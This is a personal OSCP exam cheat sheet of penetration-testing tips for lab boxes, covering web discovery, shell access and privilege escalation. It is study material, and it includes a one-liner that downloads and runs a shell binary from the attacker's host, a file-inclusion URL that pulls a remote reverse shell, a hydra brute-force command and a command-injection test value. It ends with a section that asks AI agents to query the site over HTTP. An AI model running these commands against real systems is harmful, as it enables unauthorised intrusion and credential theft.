# OSCP - Things to Try When Stuck ### Initial Access #### Web discovery * Search for `http://site/[hostname]` if you can't find a directory or software you think should exist. * Try both GET and POST methods for all URLs given that may be blocking data via a particular HTTP method. * Fuzz parameters with ffuf. * Examine response headers for minor custom errors. #### Getting a shell * To save time, upload a web shell instead of manually executing PHP commands. * Some PHP local file inclusion vulnerabilities can reference remote resources with `?path=http://[kali ip]/rev-shell.php`. * Break up an exploit. Use Wireshark to watch for ICMP pings back home instead of going for a reverse shell right away. * Instead of sharing a full rev shell payload, download an elf, +x, and execute it all in 1 command: `wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf` * If a CMS has an RCE, look closely at what/where it's implemented. If it has /skins/ in a proof-of-concept URL, check for that functionality in admin panel or in online documentation. * When calling back on a port (web request, shell, etc.) try multiple ports if the first fails. * Piece together multiple initial access exploits. If one creates a web account and tries for a shell and fails, add `exit(0)` in the python script after the account is created and use the credentials for another exploit. * Use the same ports the box has open for shell callbacks. * Try at least 4 ports and ping when trying to get a callback. * If you can control data being read to the server, always consider serialization. * Always test payloads locally, especially if it's blind. * Consider where can you write data to that's then read back in to the server. #### General * Don't spin wheels on other routes if something has a known exploit to root and it's a 10 pointer. * Check version numbers to ensure something isn't a false flag. * Consider similar protocols. If you get an SSH key, try using it over SCP. * Type version numbers carefully! * For hydra always do -e nsr. Example: `hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ftp -vV -f -e nsr -I` * Look for `auth-owners` in nmap to get usernames. * FTP - always be in a directory on kali that's writable to download files. * FTP brute force "admin". * Search Metasploit modules for ideas . * Search a software's Github page for version files that would give specific information. * See Proving Grounds' Dibble for node.js RCE. * Review page source code for commented out areas for every page. * Guess parameters. If there's a POST forgot\_pass.php with an email param, try `GET /forgot_pass.php?email=%0aid.` * Parameter/command injection fuzzing: * Payload list: [github.com/payloadbox/command-injection-payload-list](https://github.com/payloadbox/command-injection-payload-list) * `ffuf -w cmd-wordlist.txt -u 192.168.1.1/under_construction/forgot.php?email=abcdFUZZde` * See Proving Grounds' Hetemit for an example * When brute forcing credentials, guess the software name as the username and password. * When dealing with file type uploads, try specifying just the header like GIF89a;. Files pulled from Google Images could be made different and not identified as a GIF. ### Windows Privilege Escalation * Explore the C:\ drive root. Some scheduled tasks can't be seen as a low level user could be located at C:\\. * Always test a reverse shell on a windows box when attempting to get a shell. * Explore alternatives to a reverse shell. Leverage exposed remote access protocols. For example, if a reverse shell doesn't work, execute a command to change the Administrator password and used smbexec to auth. * Identify all users. Attempt to brute force authentication via RDP * Always view "C:\program files" and "C:\program files (x86)" for installed apps. ### Linux Privilege Escalation * Privesc scripts aren't always right: * e.g. a decoy exist item in crontab when `sudo -l` reveals a process dumper used to get credentials from memory. * If a process dumper is available, don't Google too deep. See if there are custom "password" processes to target. * `su root` is the best way to switch to root if you have a password but aren't in root group. * Identify all users. Attempt to brute force auth ssh if `/home` or `/etc/passwd` is pulled. * Always run `echo $PATH` to show available commands/locations. * Docker - see Proving Grounds' Sirol/Escape box. * If a user is in a group, it's probably for a reason. * Fully understand software that's related to a user's group (e.g. fail2ban group). * Use [pspy](https://github.com/DominicBreuker/pspy) to spy on processes and cronjobs you may not be able to see * Run `groups`. * `cat ~/.profile && cat ~/.bashrc`. * If running as www-data, always inspect the contents of html or the application, look for commented out passwords. * If another user exist, always `su [user]` with no password and their name as the password. * Check `/var/backups`. * Custom SUIDs won't be highlighted as linpeas and other privesc scripts don't know what they are. * Examine each and every SUD! * Run [linux-smart-enumeration/lse.sh](https://github.com/diego-treitos/linux-smart-enumeration) as a backup privilege escalation script. * Files with caps / capabilities - see Proving Grounds' Escape box. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.blakejarvis.com/oscp/oscp-things-to-try-when-stuck.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.